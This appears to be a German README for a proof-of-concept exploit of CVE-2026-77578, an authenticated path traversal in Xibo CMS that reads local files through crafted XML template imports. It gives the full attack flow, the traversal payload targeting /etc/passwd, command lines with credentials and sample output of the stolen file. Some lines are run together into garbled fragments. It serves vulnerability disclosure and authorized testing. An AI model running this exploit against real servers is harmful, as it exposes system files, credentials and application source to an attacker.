
Python-Proof-of-Concept, das CVE-2026-77578 ausnutzt, einen authentifizierten Path Traversal in Xibo CMS, der beliebige lokale Dateien über manipulierte XML-Template-Importe liest.
CVE-2026-77578 ist eine authentifizierte Schwachstelle zum beliebigen lokalen Dateilesen in Xibo CMS.
Ein authentifizierter Benutzer mit Admin-Rechten oder Zugriff auf Modulvorlagen kann eine präparierte XML-Vorlage importieren, die ein pfadbasiertes Asset mit einer Traversal-Sequenz enthält. Auf das resultierende Asset kann anschließend über den Modul-Asset-Endpunkt zugegriffen werden, wodurch Xibo den Inhalt der referenzierten lokalen Datei zurückgibt.
<= 4.4.3>= 4.4.4AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)Xibo veröffentlichte die Schwachstelle als GHSA-pc3g-2hhm-46qc und bestätigte, dass die Versionen <= 4.4.3 betroffen und >= 4.4.4 gepatcht sind. Der Hinweis stuft die Schwachstelle als Hoch mit einem CVSS v3.1-Score von 8.8 ein und identifiziert CVE-2026-77578.
Das bereitgestellte Python-PoC automatisiert den Ausnutzungsprozess:
/developer/template/import hoch./module/asset/<asset-id> an.python3 poc.py <URL> -u <USERNAME> -p <PASSWORD> -f <FILE>
Beispiel:
python3 poc.py http://localhost \
-u xibo_admin \
-p password \
-f /etc/passwd
Ein weiteres Beispiel:
python3 poc.py http://localhost \
-u xibo_admin \
-p password \
-f /etc/os-release
Die Option -f verwendet standardmäßig /etc/passwd.
Das Folgende demonstriert das erfolgreiche Abrufen von /etc/passwd:
==============================================
FILE CONTENT
==============================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Authenticated User
|
v
GET /developer/template/view
|
v
Extract X-XSRF-TOKEN
|
v
POST /developer/template/import
|
| Crafted XML
| path="../../../../../etc/passwd"
v
Xibo creates the asset
|
v
GET /module/asset/<asset-id>
|
v
Contents of local file returned
Die Schwachstelle wurde erfolgreich gegen mehrere Dateien in einer lokalen Xibo CMS 4.4.3-Testumgebung validiert, darunter:
/etc/passwd/etc/hosts/etc/os-release/var/www/cms/web/index.phpDer Test mit der PHP-Quelldatei zeigt, dass das Problem in der Lage ist, Anwendungsquellcode zurückzugeben, nicht nur Systemmetadaten.
Eine erfolgreiche Ausnutzung ermöglicht es einem authentifizierten Angreifer mit den erforderlichen Modulvorlagen-Privilegien, beliebige Dateien zu lesen, auf die der Xibo-Anwendungsprozess zugreifen kann.
Je nach Bereitstellung kann dies Folgendes offenlegen:
Dieses Proof of Concept wird ausschließlich für autorisierte Sicherheitsforschung und defensives Testen bereitgestellt.
Testen Sie nur Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung zur Bewertung haben.
CVE-2026-77578/
├── poc.py
├── README.md
├── LICENSE
├── .gitignore
└── screenshots/
└── poc-output.png